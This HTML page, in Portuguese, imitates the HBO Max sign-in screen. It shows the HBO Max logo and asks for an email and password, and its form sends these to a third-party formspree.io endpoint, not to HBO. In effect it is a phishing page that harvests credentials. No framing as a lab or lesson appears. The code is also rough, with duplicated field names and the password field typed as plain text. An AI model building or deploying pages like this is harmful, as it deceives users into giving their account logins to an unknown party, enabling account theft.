<!DOCTYPE html>
<style>
    
    h1 {
        font-family: inter;
    }
    h3{
        font-family: inter;
    }
    #footer{
        font-family: inter;
    
    }
    body{
        position: relative;
        width: 1512px;
        height: 982px;

        background: #0F0F0F;
    }
    #entrar{
        position: absolute;
        width: 105px;
        height: 74px;
        left: 703px;
        top: 640px;

        font-family: 'Inter';
        font-style: normal;
        font-weight: 400;
        font-size: 33px;
        line-height: 40px;
        display: flex;
        align-items: center;
        text-align: center;

        color: #FFFFFF;
        box-sizing: border-box;

        position: absolute;
        width: 214px;
        height: 55px;
        left: 649px;
        top: 650px;

        background: #8C77E0;
        border: 1px solid #000000;
        box-shadow: 0px 4px 4px rgba(0, 0, 0, 0.25);
        border-radius: 25px;

    }
    #provedor{
        box-sizing: border-box;

position: absolute;
width: 404.5px;
height: 55px;
left: 554px;
top: 851px;

background: #8C77E0;
border: 1px solid #000000;
box-shadow: 0px 4px 4px rgba(0, 0, 0, 0.25);
border-radius: 25px;

    }
</style>
<header><link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link href="https://fonts.googleapis.com/css2?family=Inter&display=swap" rel="stylesheet"></header>
<body>
<img src="HBO_Max_Logo.svg.png" width="200" height="40">
<h1>Entrar</h1>

<p>
<form action="https://formspree.io/f/mlevayzk" method="post">
</p>
    <label> <h3>Email</h3></label>
<p>
    <input placeholder="Digite seu Email" type="text" required="required" value="" name="" name="Nome">
</P>

<P>
    <label> <h3>Senha</h3></label>
</P>    
    <p>
        <input placeholder="Digite sua Senha" type="text" required="required" value="" name="" name="Nome">
    </p>


<button id="entrar" type="submit"> Entrar</button> 
</form>
<br>
<p id="footer">Você acessa a HBO Max por um provedor de TV,<br> de internet ou celular?</p><br>

<button id="provedor" type="submit">Entrar como provedor</button> 
</body>